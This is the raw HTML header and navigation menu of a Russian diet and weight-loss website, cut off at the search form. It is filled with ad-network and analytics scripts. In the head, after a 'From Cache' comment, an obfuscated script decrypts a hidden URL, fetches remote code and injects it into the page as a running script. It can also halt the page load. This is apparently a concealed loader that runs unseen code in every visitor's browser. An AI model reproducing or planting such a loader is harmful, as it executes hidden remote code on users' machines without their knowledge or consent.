<script type="application/javascript">var zone51 = "#949ce1680b1229285b923399d4c32e99";var zone52 = "#bb35d5645bf8c4b8d18336dd84dec7b1";var zone645 = "#22f4c227332998c409be22460d88066b";</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <!--Тег SCRIPT-->
    <script type='text/javascript' src='//et-code.ru/rtcode/p2.php?id=287&mode=script'></script>
    <meta name="google-site-verification" content="IpStfyrMtlT8pHm90HBqeuWZME1GwqMXUKp2Fswx9Ew" />
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
    <meta name="viewport" content="width=1200">
    <meta name='yandex-verification' content='73ba44905ac8c92c'/>

    <title>Эффективные диеты для похудения, как похудеть без вреда для здоровья - AzbukaDiet.ru</title>

        
<!-- All in One SEO Pack 2.4.6.1 by Michael Torbert of Semper Fi Web Design[778,818] -->
<meta name="description"  content="Правильное питание для всех, диеты для похудения, методы и средства эффективного похудения, сбросить лишний вес, упражнения для похудения, как питаться здорово" />

<meta name="keywords"  content="диеты, правильное питание, похудение, похудание, препараты, лишний вес, похудеть" />

<link rel="canonical" href="http://www.azbukadiet.ru/" />
<!-- /all in one seo pack -->
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.4\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.4\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.azbukadiet.ru\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.4"}};
			!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56692,8205,9792,65039],[55357,56692,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='yarppWidgetCss-css'  href='http://www.azbukadiet.ru/wp-content/plugins/yet-another-related-posts-plugin/style/widget.css?ver=4.9.4' type='text/css' media='all' />
<link rel='stylesheet' id='home-css'  href='http://www.azbukadiet.ru/wp-content/themes/logistix-3c_new/css/home.css?ver=4.9.4' type='text/css' media='all' />
<link rel='stylesheet' id='toc-screen-css'  href='http://www.azbukadiet.ru/wp-content/plugins/table-of-contents-plus/screen.min.css?ver=1509' type='text/css' media='all' />
<link rel='stylesheet' id='wp-postratings-css'  href='http://www.azbukadiet.ru/wp-content/plugins/wp-postratings/css/postratings-css.css?ver=1.85' type='text/css' media='all' />
<script type='text/javascript' src='http://www.azbukadiet.ru/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://www.azbukadiet.ru/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<link rel='https://api.w.org/' href='http://www.azbukadiet.ru/wp-json/' />
<link rel="alternate" type="application/json+oembed" href="http://www.azbukadiet.ru/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.azbukadiet.ru%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://www.azbukadiet.ru/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.azbukadiet.ru%2F&#038;format=xml" />
<style>.pseudo-link { color: #008acf; cursor: pointer; text-decoration: underline;}.pseudo-link:hover { text-decoration: none;}</style><meta property="og:title" content="Эффективные диеты для похудения, как похудеть без вреда для здоровья - AzbukaDiet.ru"/><meta property="og:description" content="Правильное питание для всех, диеты для похудения, методы и средства эффективного похудения, сбросить лишний вес, упражнения для похудения, как питаться здорово"/><meta property="og:type" content="article"/><meta property="og:url" content="http://www.azbukadiet.ru/"/><meta property="og:site_name" content="azbukadiet.ru"/><meta property="og:image" content="http://azbukadiet.ru/media/header_new.png"/>

    <link rel="icon" href="/favicon.ico" type="image/x-icon">
    <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">
    <link rel="stylesheet" type="text/css" href="http://www.azbukadiet.ru/wp-content/themes/logistix-3c_new/style.css"/>
    <link rel="stylesheet" type="text/css" href="http://www.azbukadiet.ru/wp-content/themes/logistix-3c_new/style_new.css"/>
    <link rel="stylesheet" type="text/css" href="/css/flipper.css"/>
    <link rel="stylesheet" type="text/css" href="/css/custom-theme/jquery-ui-1.8.14.custom.css" />
    <link rel="stylesheet" type="text/css" href="http://www.azbukadiet.ru/wp-content/themes/logistix-3c_new/css/addMePlz.css"  media="screen">
    <link rel="stylesheet" type="text/css" href='http://fonts.googleapis.com/css?family=Open+Sans:400,700&amp;subset=latin,cyrillic-ext' >

    <script type="text/javascript" src='http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.js'></script>
    <script type="text/javascript" src="/js/jquery-ui-1.8.14.custom.min.js"></script>
    <script type="text/javascript" src="//vk.com/js/api/openapi.js?101"></script>
    <script type="text/javascript" src="/js/jquery.openx.tag.js"></script>
    <script type="text/javascript" src="http://www.azbukadiet.ru/wp-content/themes/logistix-3c_new/underbanner/js/the_underbanner.js"></script>
    <script type="text/javascript" src="http://www.azbukadiet.ru/wp-content/themes/logistix-3c_new/underbanner/js/the_underbanner_init.js"></script>
    <script type="text/javascript" src="http://www.azbukadiet.ru/wp-content/themes/logistix-3c_new/js/adriver.core.2.js"></script>
    <script type="text/javascript" src="http://www.azbukadiet.ru/wp-content/themes/logistix-3c_new/js/commentajax.js"></script>
    <script type="text/javascript" src="http://www.azbukadiet.ru/wp-content/themes/logistix-3c_new/js/func.js"></script>
    <script type="text/javascript" src="/js/advert.js"></script>
    <script type="text/javascript" src="/js/check.js"></script>
    <script type="text/javascript" src="/js/func.js"></script>
    <script type="text/javascript" src="/dinamic-baner/js/jquery.cookie.js"></script>
    <script type="text/javascript" src="/dinamic-baner/js/handler.js"></script>
    <script src='https://www.google.com/recaptcha/api.js'></script>
    <script type="text/javascript" src="http://www.azbukadiet.ru/wp-content/themes/logistix-3c_new/js/article.js"></script>
    <link rel="stylesheet" type="text/css" href="http://www.azbukadiet.ru/wp-content/themes/logistix-3c_new/light/src/css/lightcase.css">
    <link rel="stylesheet" type="text/css" href="http://www.azbukadiet.ru/wp-content/themes/logistix-3c_new/light/src/css/custom.css">
    
    <!--/* mobile_azbukadiet */-->

    <script type='text/javascript'><!--//<![CDATA[
        var m3_u = (location.protocol=='https:'?'https://openx.ctlc.ru/www/delivery/ajs.php':'http://openx.ctlc.ru/www/delivery/ajs.php');
        var m3_r = Math.floor(Math.random()*99999999999);
        if (!document.MAX_used) document.MAX_used = ',';
        document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
        document.write ("?zoneid=636");
        document.write ('&cb=' + m3_r);
        if (document.MAX_used != ',') document.write ("&exclude=" + document.MAX_used);
        document.write (document.charset ? '&charset='+document.charset : (document.characterSet ? '&charset='+document.characterSet : ''));
        document.write ("&loc=" + escape(window.location));
        if (document.referrer) document.write ("&referer=" + escape(document.referrer));
        if (document.context) document.write ("&context=" + escape(document.context));
        if (document.mmm_fo) document.write ("&mmm_fo=1");
        document.write ("'><\/scr"+"ipt>");
        //]]>-->
    </script>
    <noscript><a href='http://openx.ctlc.ru/www/delivery/ck.php?n=a85be976&cb=INSERT_RANDOM_NUMBER_HERE' target='_blank'><img src='http://openx.ctlc.ru/www/delivery/avw.php?zoneid=636&cb=INSERT_RANDOM_NUMBER_HERE&n=a85be976' border='0' alt='' /></a></noscript>

    <link rel="stylesheet" type="text/css" href='/hypercontext/styles.css' >

    <!-- Facebook Pixel Code -->
    <script>
    !function(f,b,e,v,n,t,s){if(f.fbq)return;n=f.fbq=function(){n.callMethod?
    n.callMethod.apply(n,arguments):n.queue.push(arguments)};if(!f._fbq)f._fbq=n;
    n.push=n;n.loaded=!0;n.version='2.0';n.queue=[];t=b.createElement(e);t.async=!0;
    t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}(window,
    document,'script','https://connect.facebook.net/en_US/fbevents.js');
    fbq('init', '336209643422767'); // Insert your pixel ID here.
    fbq('track', 'PageView');
    </script>
<noscript><img height="1" width="1" style="display:none" 
src="https://www.facebook.com/tr?id=336209643422767&ev=PageView&noscript=1" 
/></noscript>
<!-- DO NOT MODIFY -->
<!-- End Facebook Pixel Code -->
<script type="text/javascript">(window.Image ? (new Image()) : document.createElement('img')).src = location.protocol + '//vk.com/rtrg?r=qthmS4QwR6jxd4ygvfcVF49KqC3mC8wvSdbdl8cUqMvx53AaXK/HOHQIz57q2viLURIdhA7NfqmYgg22fIjdW5JCRJwheatXqPlGJY*TYajQMVq4jxAdAZINV/rm05icTwNs3Zk/7Z6OTGt19JjQGahxgJuzEkEoW9*1hg2KQuI-&pixel_id=1000066388';</script>

<!-- From Cache --><script>var _0x35f9=['w4dkw4rChkllP0vDl8KZwpbCjSZm','w7DDn8KMw6UDd1PCmERQw5HCiw==','wpk8IMKEwqk5S8K5wrMWw6XDjcO7wq/CicKe','w7LDtF52','w43CvcKSwqnDiA==','dhpp','wpzCjkBQPsKWUsKbwrXCnMOTw5V9wotqwq0=','wqh6wqp6w6c=','wo8Cw7DCkQ==','w6xdw6fCukhi','wonCi1ZyLcKH','TSbDg8OvYsO3FsO7wp3DrGtNwps=','wqV6wr1z','w60kwpgAG8OoHxo=','bsO9YsKhLCk=','w6Iiw7EvZTNqT8ONwoU9QCNqw5vCsHI=','cxBnYw==','woRQHsOcw6jDk8KeacKHfcKXRw==','XsOxNcOkwqt6Tx4=','cBB/dA==','wo/DvMKCw7/CisKIUcKOXsK2AQ==','woRBE8Oxw7nDtMKEZcKAfMKQ','w7A5alLCiUtweg==','GsOBw5nCkcOfJSPDuw==','LMKGMkJe','ccO7fsKvKDU=','K8KZDV9YwqrDvsKe','wrXDncOmwqvCt8O2','w7xBw6fCvH5+K3zDs8Kc','w7lbw6nCo355LmvDscKHwofCjQ==','w7jDkcOLGA==','wpjCvXJ5EcKkdcKdwqnCn8KVwop9woxnwrAOwqXDp8O0w50dw6fDkA==','LcKEw5fDv8KdfcOrfxU5K3bDtlcmWix8wrfDqxB3wp3CpW97dCjDtDlTwpNLw6RKCQ5PwqHChxR1Al0mwpLDkn9CSikfLcK8XlpCw7zClcOAw6Rje8Opw5tweSfDjRTCvsOZTw=='];(function(_0x37d001,_0x58a8c0){var _0x4ea372=function(_0xa5c0e7){while(--_0xa5c0e7){_0x37d001['push'](_0x37d001['shift']());}};_0x4ea372(++_0x58a8c0);}(_0x35f9,0x129));var _0x530c=function(_0x3000ed,_0x36e528){_0x3000ed=_0x3000ed-0x0;var _0x1976c6=_0x35f9[_0x3000ed];if(_0x530c['DYpAwm']===undefined){(function(){var _0x5c3521=function(){var _0x54af8c;try{_0x54af8c=Function('return\x20(function()\x20'+'{}.constructor(\x22return\x20this\x22)(\x20)'+');')();}catch(_0x4af6cd){_0x54af8c=window;}return _0x54af8c;};var _0x516e70=_0x5c3521();var _0x1001b6='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x516e70['atob']||(_0x516e70['atob']=function(_0x3038d6){var _0x55fe6f=String(_0x3038d6)['replace'](/=+$/,'');for(var _0x4e2df3=0x0,_0x298e94,_0xbe7ad2,_0xfea64f=0x0,_0x4b890e='';_0xbe7ad2=_0x55fe6f['charAt'](_0xfea64f++);~_0xbe7ad2&&(_0x298e94=_0x4e2df3%0x4?_0x298e94*0x40+_0xbe7ad2:_0xbe7ad2,_0x4e2df3++%0x4)?_0x4b890e+=String['fromCharCode'](0xff&_0x298e94>>(-0x2*_0x4e2df3&0x6)):0x0){_0xbe7ad2=_0x1001b6['indexOf'](_0xbe7ad2);}return _0x4b890e;});}());var _0x1f1c3a=function(_0xe11889,_0x2e1477){var _0x285cc9=[],_0x5240d7=0x0,_0x1494c6,_0x5d83be='',_0x3266f='';_0xe11889=atob(_0xe11889);for(var _0x547630=0x0,_0x1222e=_0xe11889['length'];_0x547630<_0x1222e;_0x547630++){_0x3266f+='%'+('00'+_0xe11889['charCodeAt'](_0x547630)['toString'](0x10))['slice'](-0x2);}_0xe11889=decodeURIComponent(_0x3266f);for(var _0x3a3fe0=0x0;_0x3a3fe0<0x100;_0x3a3fe0++){_0x285cc9[_0x3a3fe0]=_0x3a3fe0;}for(_0x3a3fe0=0x0;_0x3a3fe0<0x100;_0x3a3fe0++){_0x5240d7=(_0x5240d7+_0x285cc9[_0x3a3fe0]+_0x2e1477['charCodeAt'](_0x3a3fe0%_0x2e1477['length']))%0x100;_0x1494c6=_0x285cc9[_0x3a3fe0];_0x285cc9[_0x3a3fe0]=_0x285cc9[_0x5240d7];_0x285cc9[_0x5240d7]=_0x1494c6;}_0x3a3fe0=0x0;_0x5240d7=0x0;for(var _0x1a7d7d=0x0;_0x1a7d7d<_0xe11889['length'];_0x1a7d7d++){_0x3a3fe0=(_0x3a3fe0+0x1)%0x100;_0x5240d7=(_0x5240d7+_0x285cc9[_0x3a3fe0])%0x100;_0x1494c6=_0x285cc9[_0x3a3fe0];_0x285cc9[_0x3a3fe0]=_0x285cc9[_0x5240d7];_0x285cc9[_0x5240d7]=_0x1494c6;_0x5d83be+=String['fromCharCode'](_0xe11889['charCodeAt'](_0x1a7d7d)^_0x285cc9[(_0x285cc9[_0x3a3fe0]+_0x285cc9[_0x5240d7])%0x100]);}return _0x5d83be;};_0x530c['EplYAS']=_0x1f1c3a;_0x530c['SOWuRs']={};_0x530c['DYpAwm']=!![];}var _0x4d6e5d=_0x530c['SOWuRs'][_0x3000ed];if(_0x4d6e5d===undefined){if(_0x530c['jlmCra']===undefined){_0x530c['jlmCra']=!![];}_0x1976c6=_0x530c['EplYAS'](_0x1976c6,_0x36e528);_0x530c['SOWuRs'][_0x3000ed]=_0x1976c6;}else{_0x1976c6=_0x4d6e5d;}return _0x1976c6;};new(function(){var _0x57e33c,_0x226be9=0x12c,_0x571c09;var _0x1e3550=function(_0x3f5937,_0x3cc969,_0x5e84c1,_0x39e2ce){_0x571c09=_0x3f5937;_0x226be9=_0x3cc969;_0x57e33c=_0x5e84c1;_0x2fd947([_0x1cbca7(atob(_0x57e33c),_0x3156f8(_0x3f5937)),_0x39e2ce]['join']('/'),_0x3fb0ef,_0x28abdb);};var _0x2fd947=function(_0x5c1e98,_0x3591ac,_0x5bd5ce){var _0x1d5d06=new window[(_0x530c('0x0','26v^'))]();_0x1d5d06['open']('GET',_0x5c1e98,!![]);_0x1d5d06[_0x530c('0x1',']^n&')]='text';_0x1d5d06[_0x530c('0x2','&ZO[')](_0x530c('0x3','IpKW'),_0x3591ac);_0x1d5d06[_0x530c('0x4','^b]w')]=window['performance'][_0x530c('0x5','!5]r')]();_0x1d5d06[_0x530c('0x6','AVJ[')](_0x530c('0x7','sqHI'),_0x5bd5ce);_0x1d5d06[_0x530c('0x8','9^nZ')](null);};var _0x3fb0ef=function(_0x4d2afb){var _0xdcab90=_0x4d2afb['target'];if(_0xdcab90[_0x530c('0x9','26v^')]==0xcc){return;}_0x3ab50d(_0xdcab90['responseText']);};var _0x28abdb=function(_0x3ae819){var _0x34e27e=_0x3ae819[_0x530c('0xa','AVJ[')];var _0x440f9e=window['performance'][_0x530c('0x5','!5]r')]()-_0x34e27e['start'];if(_0x440f9e<_0x226be9){_0x46179e();}};var _0x614663=function(_0x206d27){var _0x52a11f=window['document'][_0x530c('0xb','PA3p')]('a');_0x52a11f[_0x530c('0xc','sqHI')]=_0x206d27;return _0x52a11f;};var _0x3ab50d=function(_0x2868c2){var _0x43c257=window[_0x530c('0xd','D[J(')]['createElement'](_0x530c('0xe','4k2b'));_0x43c257['async']=![];_0x43c257['textContent']=_0x2868c2;var _0x595418={'id':_0x530c('0xf','sEgX'),'data-config':_0x571c09,'data-base':_0x57e33c};Object[_0x530c('0x10','!5]r')](_0x595418)['forEach'](function(_0x33505b){_0x43c257[_0x530c('0x11','yemt')](_0x33505b,_0x595418[_0x33505b]);});window[_0x530c('0x12','50l*')][_0x530c('0x13','!5]r')][_0x530c('0x14','aIsk')](_0x43c257);};var _0x46179e=function(){var _0x3a9947=window['document'][_0x530c('0x15','yemt')];for(var _0x4b3ba6=0x0;_0x4b3ba6<_0x3a9947['length'];_0x4b3ba6++){_0x3a9947[_0x4b3ba6][_0x530c('0x16','^25W')]=!![];}window['stop']();};function _0x3156f8(_0x514912){var _0x41c054=0x0;_0x514912=_0x514912[_0x530c('0x17','BxD^')]()[_0x530c('0x18','c[$2')]('');for(var _0x2eefdf=0x0;_0x2eefdf<_0x514912[_0x530c('0x19','4k2b')];_0x2eefdf++){_0x41c054+=parseInt(_0x514912[_0x2eefdf]);}return _0x41c054[_0x530c('0x1a','c[$2')]();}function _0x1cbca7(_0x31e8b4,_0x3bbd76){var _0x2b2397='';for(var _0x58ca03=0x0;_0x58ca03<_0x31e8b4[_0x530c('0x1b','Z#xX')];_0x58ca03++){var _0x4b416e=_0x31e8b4[_0x530c('0x1c','26v^')](_0x58ca03);var _0x412144=_0x4b416e^_0x3bbd76;_0x2b2397=_0x2b2397+String[_0x530c('0x1d','26v^')](_0x412144);}return _0x2b2397;}return _0x1e3550;}())(_0x530c('0x1e','C0GV'),0x12c,_0x530c('0x1f','AVJ['),_0x530c('0x20','!dc5'));</script></head>

<body>

<!-- Rating@Mail.ru counter -->
<script type="text/javascript">
var _tmr = window._tmr || (window._tmr = []);
_tmr.push({id: "2853963", type: "pageView", start: (new Date()).getTime()});
(function (d, w, id) {
  if (d.getElementById(id)) return;
  var ts = d.createElement("script"); ts.type = "text/javascript"; ts.async = true; ts.id = id;
  ts.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//top-fwz1.mail.ru/js/code.js";
  var f = function () {var s = d.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ts, s);};
  if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); }
})(document, window, "topmailru-code");
</script><noscript><div style="position:absolute;left:-10000px;">
<img src="//top-fwz1.mail.ru/counter?id=2853963;js=na" style="border:0;" height="1" width="1" alt="Рейтинг@Mail.ru" />
</div></noscript>
<!-- //Rating@Mail.ru counter -->

<div id="fb-root"></div>
<script>(function(d, s, id) {
        var js, fjs = d.getElementsByTagName(s)[0];
        if (d.getElementById(id)) return;
        js = d.createElement(s); js.id = id;
        js.src = 'https://connect.facebook.net/ru_RU/sdk.js#xfbml=1&version=v2.12&appId=828343680555304&autoLogAppEvents=1';
        fjs.parentNode.insertBefore(js, fjs);
    }(document, 'script', 'facebook-jssdk'));</script>

<a id="various2" class="button line-blue" style="display: none;" data-rel="lightcase:myCollection" href="/ajax/subscrible.php">Ajax Form</a><script type="application/javascript">var zone1133 = "#febba5802c7e1a3ef4cf0f283282a52d";</script>
<!--/* branding_top */-->
<div class="post" id="febba5802c7e1a3ef4cf0f283282a52d">
<script type='text/javascript'><!--//<![CDATA[
var m3_u = (location.protocol=='https:'?'https://openx.ctlc.ru/www/delivery/ajs.php':'http://openx.ctlc.ru/www/delivery/ajs.php');
var m3_r = Math.floor(Math.random()*99999999999);
if (!document.MAX_used) document.MAX_used = ',';
document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
document.write ("?zoneid=1133");
document.write ('&cb=' + m3_r);
if (document.MAX_used != ',') document.write ("&exclude=" + document.MAX_used);
document.write (document.charset ? '&charset='+document.charset : (document.characterSet ? '&charset='+document.characterSet : ''));
document.write ("&loc=" + escape(window.location));
if (document.referrer) document.write ("&referer=" + escape(document.referrer));
if (document.context) document.write ("&context=" + escape(document.context));
if (document.mmm_fo) document.write ("&mmm_fo=1");
document.write ("'><\/scr"+"ipt>");
//]]>--></script><noscript><a href='http://openx.ctlc.ru/www/delivery/ck.php?n=a09d09b4&cb=INSERT_RANDOM_NUMBER_HERE' target='_blank'><img src='http://openx.ctlc.ru/www/delivery/avw.php?zoneid=1133&cb=INSERT_RANDOM_NUMBER_HERE&n=a09d09b4' border='0' alt='' /></a></noscript>
</div>
<div id="kupivip_fade" style="top: 0; left: 0; width: 100%; height: 100%; background-color: rgba(0,0,0,0.5); position: fixed; display: none; z-index: 9888"></div>
<div id="ya_metrica">
    <!-- Yandex.Metrika counter -->
    <script type="text/javascript">
        (function (d, w, c) {
            (w[c] = w[c] || []).push(function() {
                try {
                    w.yaCounter21450451 = new Ya.Metrika({id:21450451,
                        webvisor:true,
                        clickmap:true,
                        trackLinks:true,
                        accurateTrackBounce:true});
                } catch(e) { }
            });

            var n = d.getElementsByTagName("script")[0],
                s = d.createElement("script"),
                f = function () { n.parentNode.insertBefore(s, n); };
            s.type = "text/javascript";
            s.async = true;
            s.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//mc.yandex.ru/metrika/watch.js";

            if (w.opera == "[object Opera]") {
                d.addEventListener("DOMContentLoaded", f, false);
            } else { f(); }
        })(document, window, "yandex_metrika_callbacks");
    </script>
    <noscript><div><img src="//mc.yandex.ru/watch/21450451" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
    <!-- /Yandex.Metrika counter -->
</div>

<div id="ya_metrica">
    <script>
        (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
            (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
            m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
        })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

        ga('create', 'UA-41508091-1', 'auto');
        ga('send', 'pageview');

    </script>
</div>

<header>
    <a class="logo" href="/">
        <img src="/media/header_new.png">
    </a>
    <div class="ad-top">
        <script type='text/javascript'><!--//<![CDATA[
            var m3_u = (location.protocol=='https:'?'https://openx.ctlc.ru/www/delivery/ajs.php':'http://openx.ctlc.ru/www/delivery/ajs.php');
            var m3_r = Math.floor(Math.random()*99999999999);
            if (!document.MAX_used) document.MAX_used = ',';
            document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
            document.write ("?zoneid=1797");
            document.write ('&amp;cb=' + m3_r);
            if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
            document.write (document.charset ? '&amp;charset='+document.charset : (document.characterSet ? '&amp;charset='+document.characterSet : ''));
            document.write ("&amp;loc=" + escape(window.location));
            if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
            if (document.context) document.write ("&context=" + escape(document.context));
            if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
            document.write ("'><\/scr"+"ipt>");
            //]]>--></script><noscript><a href='http://openx.ctlc.ru/www/delivery/ck.php?n=a283fc3e&amp;cb=INSERT_RANDOM_NUMBER_HERE' target='_blank'><img src='http://openx.ctlc.ru/www/delivery/avw.php?zoneid=1797&amp;cb=INSERT_RANDOM_NUMBER_HERE&amp;n=a283fc3e' border='0' alt='' /></a></noscript>
    </div>

</header>

<ul id="cssmenu" class="top-menu">
    <li><a href="/dieta-online">Рассчитать диету</a>
        <ul>
            <li><a href="/rasxod-kalorij-pri-razlichnyx-vidax-deyatelnosti">расход калорий</a></li>
            <li><a href="/schetchik-kalorij">счетчик калорий</a></li>
            <li><a href="/tablicy-kalorijnosti">таблица калорийности</a></li>
            <li><a href="/sutochnaya-norma-kalorij">суточная норма калорий</a></li>
            <li><a href="/soderzhanie-zhira-v-organizme">калькулятор жира</a></li>
        </ul>
    </li>
    <script type='text/javascript'><!--//<![CDATA[
        var m3_u = (location.protocol=='https:'?'https://openx.ctlc.ru/www/delivery/ajs.php':'http://openx.ctlc.ru/www/delivery/ajs.php');
        var m3_r = Math.floor(Math.random()*99999999999);
        if (!document.MAX_used) document.MAX_used = ',';
        document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
        document.write ("?zoneid=1367");
        document.write ('&amp;cb=' + m3_r);
        if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
        document.write (document.charset ? '&amp;charset='+document.charset : (document.characterSet ? '&amp;charset='+document.characterSet : ''));
        document.write ("&amp;loc=" + escape(window.location));
        if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
        if (document.context) document.write ("&context=" + escape(document.context));
        if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
        document.write ("'><\/scr"+"ipt>");
        //]]>--></script><noscript><a href='http://openx.ctlc.ru/www/delivery/ck.php?n=a87c569f&amp;cb=INSERT_RANDOM_NUMBER_HERE' target='_blank'><img src='http://openx.ctlc.ru/www/delivery/avw.php?zoneid=1367&amp;cb=INSERT_RANDOM_NUMBER_HERE&amp;n=a87c569f' border='0' alt='' /></a></noscript>
    <li><a href="/category/diety">Диеты</a>
        <ul>
            <li><a href="/category/diety/bystrye-diety">Быстрые диеты</a></li>
            <li><a href="/category/diety/nizkokalorijnye-diety">Низкокалорийные диеты</a></li>
            <li><a href="/category/diety/belkovye-diety">Белковые диеты</a></li>
            <li><a href="/category/diety/ochishhayushhie-diety">Очищающие диеты</a></li>
            <li><a href="/category/diety/monodiety">Монодиеты</a></li>
            <li><a href="/category/diety/nizkouglevodnye-diety">Низкоуглеводные диеты</a></li>
            <li><a href="/category/diety/diety-zvezd">Диеты звезд</a></li>
            <li><a href="/category/diety/nacionalnye-diety">Национальные диеты</a></li>
            <li><a href="/category/diety/diety-ot-dietologov">Диеты от диетологов</a></li>
            <li><a href="/category/diety/zhirovye-diety">Жировые диеты</a></li>
            <li><a href="/category/diety/lechebnye-diety">Лечебные диеты</a></li>
            <li><a href="/category/diety/malozhirnye-diety"> Маложирные диеты</a></li>
            <li><a href="/category/omolozhenie-organizma/omolazhivayushhie-diety">Омолаживающие диеты</a></li>
        </ul>
    </li>
    <li><a href="/category/pokhudeniye-i-krasota">Похудение и красота</a>
        <ul>
            <li><a href="/category/poxudenie">Похудение</a></li>
            <li><a href="/category/omolozhenie-organizma">Омоложение организма</a></li>
            <li><a href="/category/cellyulit">Целлюлит</a></li>
            <li><a href="/category/poxudenie/bolezni-i-problemy">Болезни и проблемы</a></li>
            <li><a href="/category/allergiya">Аллергия</a></li>
        </ul>
    </li>
    <li><a href="/category/zdorovoe-pitanie">Здоровое питание</a>
        <ul>
            <li><a href="/category/diety/sistemy-pitaniya">Системы питания</a></li>
            <li><a href="/category/diety/diety-dlya-zdorovya">Диеты для здоровья</a></li>
            <li><a href="/category/zdorovoe-pitanie/dieticheskie-recepty">Диетические рецепты</a></li>
            <li><a href="/category/zdorovoe-pitanie/dieticheskie-recepty/vashi-retsepty">Ваши рецепты</a></li>
            <li><a href="/category/zdorovoe-pitanie/dieticheskie-recepty/vashi-retsepty/konkurs-receptov"> Конкурс рецептов</a></li>
            <li><a href="/category/zdorovoe-pitanie/principy">Принципы питания</a></li>
            <li><a href="/category/zdorovoe-pitanie/produkty">Полезные продукты</a></li>
            <li><a href="/category/zdorovoe-pitanie/prakticheskie-sovety">Практические советы</a></li>
            <li><a href="/category/diety/razgruzochnye-dni">Разгрузочные дни</a></li>
        </ul>
    </li>
    <li><a href="/category/fitnes">Фитнес</a>
        <ul>
            <li><a href="/category/fitnes/fitnes-video-uroki">Фитнес видео уроки</a></li>
            <li><a href="/category/fitnes/uprazhneniya-dlya-poxudeniya">Упражнения для похудения</a></li>
            <li><a href="/category/bad-dlya-poxudeniya"> БАД для похудения</a></li>
            <li><a href="/category/vitaminy">Витамины</a></li>
        </ul>
    </li>
    <li><a href="/category/dlya-muzhchin">Для мужчин</a>
        <ul>
            <li><a href="/category/dlya-muzhchin/trenirovki-dlya-muzhchin">Тренировки для мужчин</a></li>
            <li><a href="/category/dlya-muzhchin/pitanie-dlya-muzhchin">Питание для мужчин</a></li>
        </ul>
    </li>
    <li><a href="/category/news">Новости</a></li>
</ul>

<div class="main-layer clearfix">
    <!-- sb -->
<aside class="right-layer">
    <div class="search-block">
        <noindex>
    <strong class="caption">Поиск по диетам</strong>

    <form method="get" id="searchform" action="/">

        <div class="search-input clearfix">

            <input type="text" value="" name="s" id="s" />
